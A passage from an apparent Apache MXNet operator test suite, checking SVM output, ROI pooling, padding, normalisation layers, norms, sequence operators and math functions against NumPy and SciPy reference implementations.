if arg_type1[0] != np.dtype(dtype) or arg_type1[1] != np.dtype(dtype) or out_type1[0] != np.dtype(dtype):
msg = npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) or arg_type2[1] != np.dtype(dtype) or out_type2[0] != np.dtype(dtype):
msg = npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type2[0], arg_type2[1], out_type2[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
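# l_mask encodes the labels as +/-1 one-vs-rest targets; grad_np is the L1-SVM (hinge)
# subgradient -y * 1[1 - y*x > 0], evaluated elementwise.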
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-2)*l_mask*np.maximum(1-l_mask*x_np,0)
grad_np = grad_np.astype(np.float32)
assert_almost_equal(grad_np, grad)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1234)
def test_roipooling():
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.ROIPooling(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1)
x1 = np.random.rand(4, 3, 12, 8).astype('float32')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2], [1, 3.1, 1.1, 5.2, 10.2], [0, 3, 3, 3, 3]], dtype='float32')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'write', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data':'add', 'rois':'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1E-4)
def check_pad_with_shape(shape, xpu, pad_width, mode, dtype="float64"):
# bind with label
X = mx.symbol.Variable('X', dtype=dtype)
Y = mx.symbol.Pad(data=X, mode=mode, pad_width=pad_width)
x = mx.random.uniform(-1, 1, shape, ctx=mx.cpu(), dtype=dtype).copyto(xpu)
# numpy result
pad_grouped = list(zip(*[iter(list(pad_width))] * 2))
np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0]
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
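# np_instance_norm normalises every (n, c) slice over its spatial dimensions:
# out = gamma * (x - mean) / sqrt(var + eps) + beta, with mean/var computed per sample
# and per channel and then broadcast back to the input shape via np.repeat.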
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0]
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
assert_almost_equal(exe.outputs[0], np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
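# npy_layer_norm_grad implements the standard LayerNorm backward pass: with
# xhat = (x - mu) / sigma and w = dy * gamma / sigma,
#   dgamma = sum(dy * xhat) and dbeta = sum(dy) over the non-normalised axes, and
#   dx = w - mean(w) - xhat * mean(w * xhat) along the normalised axis.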
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd, forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@pytest.mark.parametrize('enforce_safe_acc', ['1', '0'])
@pytest.mark.parametrize('dtype,forward_check_eps,backward_check_eps,in_shape_l,finite_grad_check_l', [
(np.float16, 1E-2, 1E-2, [(10, 6, 5), (10, 10)], [True, True]),
(np.float32, 1E-3, 1E-3, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]),
(np.float64, 1E-4, 1E-4, [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False])
])
def test_layer_norm(enforce_safe_acc, dtype, forward_check_eps, backward_check_eps,
in_shape_l, finite_grad_check_l):
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
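# All three numpy references first move the sequence axis to position 1 with np.moveaxis
# so the data is laid out as [batch, seqlen, ...]; they then apply the per-batch length
# (take the last valid step, mask the tail, or reverse the valid prefix) and move the
# axis back. lengths=None means "use the full sequence".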
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
